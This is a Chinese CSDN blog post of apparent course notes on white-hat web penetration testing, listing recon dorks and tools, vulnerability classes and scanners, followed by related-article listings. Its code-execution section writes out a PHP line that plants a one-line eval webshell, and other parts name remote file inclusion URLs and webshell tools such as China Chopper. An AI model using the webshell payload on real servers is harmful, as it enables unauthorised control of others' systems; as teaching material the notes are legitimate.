WEB安全白帽(一) 米斯特

最新推荐文章于 2024-09-20 20:08:08 发布
最新推荐文章于 2024-09-20 20:08:08 发布
阅读量1.3k 收藏 4
点赞数
分类专栏: 安全白帽
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq1350048638/article/details/85217713
版权

一,信息侦探技术准备工作

站长之家
搜索引擎
stie:baidu.com
inurl:baidu.com
站内侦探
//discuz论坛 https://www.***.org/space-uid-1.html
//dz 邮件找出源ip
社工库,大数据筛选
nmap.bat
nmap www.***.com -p 80
御剑
Malte go

厂商寻找

http://butian.360.cn/company/openindex
系统 后台类- **系统,平台, 管理
企业 类 - **公司,**企业,**平台

漏洞提交(白帽提交漏洞须知)

提交条件
演示
提交技巧

加密解密

md5 base64 url编码

理论

webshell exp poc 提权 渗透 远程控制 服务器
root administrator(s)
基本漏洞类型
弱口令 ***.php?info=1234
爆破 遍历
sql注入 get post cookie
xss攻击 xss.hi-ourlife.com xss平台
代码执行 命令执行 net user
文件包含 .php?include=index.php
越权
逻辑
配置错误
敏感信息泄露 site:www.*.com intext:订单

二部分 漏洞

弱口令 爆破 遍历 .
java环境安装
java一键配置
brup工具
mysql手工注入语句大全
在这里插入图片描述

XSS
反射 -没有过滤
存储 -
DOM
在这里插入图片描述

csrf原理
OWASP-CSRFTester-1.0 半自动化工具伪造工具
文件包含
本地包含 ***.com/fileiniclude.php?file=file
远程包含 ***.com/fileiniclude.php?file=http-file
挖掘 e.g www.***.com/***.php?file=
在这里插入图片描述
在这里插入图片描述
远程包含
在这里插入图片描述

代码执行:
实例地址:
http://localhost/subject/code-exe.php?code=code

    熟知可利用常见的php函数:
    phpinfo()、echo等等调试函数
    使用代码执行漏洞创建个webshell:
    <?php
    $file='mst.php';$person='<?php @eval($_POST[1]);?>';file_put_contents($file, $person, FILE_APPEND | LOCK_EX);

在这里插入图片描述
在这里插入图片描述
越权
在这里插入图片描述
在这里插入图片描述
文件上传-brup工具修改数据上传
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
三-工具

safe3wvs工具
在这里插入图片描述
在这里插入图片描述
AWVS工具
Nmap工具
在这里插入图片描述
在这里插入图片描述
中国菜刀

椰树、御剑(6款扫描工具

bugscan
BruteXSS python2.7环境
在这里插入图片描述
在这里插入图片描述
GourdScan

qq1350048638
关注
专栏目录
白帽子讲Web安全(一)浏览器安全
weixin_39157582的博客
08-23 1025
白帽子讲Web安全(一)浏览器安全1、同源策略(1)什么是同源策略(2)同源策略的应用(3)跨域访问2、浏览器沙箱(1)背景(2)原理(3)实现(4)注意 1、同源策略 (1)什么是同源策略 同源策略/SOP 是由NetScape公司提出的一个著名的安全策略。所谓同源是指 “ 协议+域名+端口 ” 三者相同,即便两个不同的域名指向同一个ip地址,也非同源。浏览器出于安全方面的考虑,只允许本域名下的接口交互,不同源的客户端脚本,在没有明确授权的情况下,不能读写对方的资源。 现在所有支持javascript的浏
斯特WEB安全白帽培训教程
01-03
斯特WEB安全培训全套视频教程 网络攻防、渗透、提权等 附工具 百度云资源
白帽子讲Web安全(对看书之后的一点笔记)
gl620321的博客
03-17 1577
这是我看了白帽子这本书自己的一些总结和想法,希望可以帮助到学网络安全的各位。并能够积极提出一些意见,助于我的改进。 第一章.世界观安全 1.网络安全 最先研究计算机系统和网络安全的人称之为“Hacker”,人们习惯于称他们为黑客。字面意思的理解就是专门破坏规则,寻找一些系统漏洞,以获得某些权力。对于现在计算机最高的权限是“root”.漏洞能够帮助黑客利用代码拿到他们想得到的东西。黑客使用的漏洞代码...
XSS 检测神器:BruteXSS 保姆级教程
最新发布
gitblog_06550的博客
09-20 450
XSS 检测神器:BruteXSS 保姆级教程 XSS检测神器BruteXSS保姆级教程 项目地址: https://gitcode.com/Resource-Bundle-Collection/8a89a ...
斯特web渗透测试网络安全洞察安全视频教程-附件资源
03-05
斯特web渗透测试网络安全洞察安全视频教程-附件资源
网易WEB白帽子-WEB安全基础
平凡的脚步也可以走完伟大的行程
03-03 1919
网易WEB白帽子 02..WEB安全基础 1.钓鱼 诱惑性的标题,仿冒真实网址,骗取用户账户,骗取用户资料 2.网页‘篡改’ hacked by Intitle : keyword 标题中还有关键字的网页 Intext : keyword 正文中还有关键字的网页 Site : domain 在某个域名或者子域名下的网页 3. 暗链 隐藏在网站中的链接 网游/医疗/博彩/色情 ...
斯特白帽培训讲义
01-04
斯特白帽培训讲义
斯特白帽培训讲义 v1.5
03-09
斯特白帽培训讲义 v1.5
day1-web安全基础(斯特web渗透测试)
qq_44870829的博客
06-23 1016
网站、专业术语、渗透测试步骤、编码加密、信息收集
网易web白帽子学习笔记
weixin_30731305的博客
10-28 993
部分转载他人 一、web基础知识 1.1.1web介绍 world wide web 万维网 web1.0  个人网站、门户站点 静态页面 web2.0  微博、博客交互式页面 随之而来有一些安全问题: 用户通过浏览器访问网站,浏览器对服务器请求资源 web工作流程: 浏览器工作流程: web是什么? web发展分为哪几个阶段? web安全问题的发展形式...
Maltego详细使用教程
01-08
Maltego是什么? Maltego是一款非常优秀的信息收集工具。与其他工具相比,不仅功能强大,而且自动化水平非常高,不需要复杂的命令,就能轻松的完成信息收集。 账号注册 1.点击maltego图标后,进入页面选择Maltego CE版本。 原创文章 9获赞 4访问量 1万+ 关注 私信 展开阅
最新,最牛的信息收集工具--MaltegoSetup.v4.2.13.13462
09-26
Maltego是国际知名的一款信息收集和分析工具,太强大,太牛了!kali自带的Maltego无法注册,因为无法显示验证码,
白帽子讲Web安全 札记
kunpengku
08-28 731
注入攻击的本质,是把用户输入的数据当代码执行。 这里有两个关键条件,第一个是用户能够控制输入, 第二个是原本程序要执行的代码,拼接了用户输入的数据。如果服务器开启错误回显 , 会为攻击者提供极大的遍历。 错误回显披露了敏感信息,对攻击者来说,构造SQL注入的语句就可以更加得心应手。通过SQL 执行 系统命令,是一个危险点。建立数据库账户时,应该遵循最小权限原则。数据库,操作系统,web应用程序
笔记(斯特白帽WEB安全攻防培训第二期)(基础01)
Quest_sec的博客
08-03 4799
*
Maltego的使用教程
Kali与编程
03-26 1193
其中,“-i [input-file]”表示指定输入文件,“-o [output-file]”表示指定输出文件,“-e [entity-type]”表示指定实体类型,“-a [transform-name]”表示指定变换名称。例如,在“Transform Manager”选项卡中选择“New Local Transform”,输入变换名称和代码,然后保存即可。在“Workspace”中拖动“Entity”到工作区中,输入目标信息,例如要查询的域名或IP地址。变换运行完毕后,将在工作区中显示结果实体。
学习web安全,强烈推荐这本《白帽子讲web安全》!
codedz的博客
05-29 2万+
Web是互联网的核心,是未来云计算和移动互联网的最佳载体,因此Web安全也是互联网公司安全业务中最重要的组成部分。 下面来看看几种常见的web漏洞: 1.XSS跨站脚本攻击 XSS跨站脚本攻击,通常指黑客通过”HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。XSS根据效果的不同还分为:反射型XSS、存储型XSS、DOM Based XSS   ...
密码学(Crypto)一些在线解密网站
热门推荐
Youzen_ing的博客
06-11 8万+
很多时候会用到加密,解密,下面就是一些链接
斯特白帽培训讲义 漏洞篇 弱口令、爆破、遍历
龙哥盟
12-20 4万+
斯特白帽培训讲义 漏洞篇 弱口令 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 成因弱口令没有严格和准确的定义,通常认为容易被别人(它们有可能对你很了解)猜测或被破解工具破解的口令均为弱口令。弱口令指的是仅包含简单数字和字母的口令,例如”123”、”abc”等,因为这样的口令很容易被别人破解。通过爆破工具就可以很容易破解用户的弱口令。目前网络上也
Python在信息安全中的时间盲注与网贷爬虫实践
此次分享由"奶权"主讲,他是斯特安全团队的专家,专注于探讨Python在具体场景中的实践应用。 首先,话题聚焦于时间盲注攻击。时间盲注是一种常见的Web应用程序漏洞利用技术,通过构造特定的SQL语句,如使用`LIKE`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值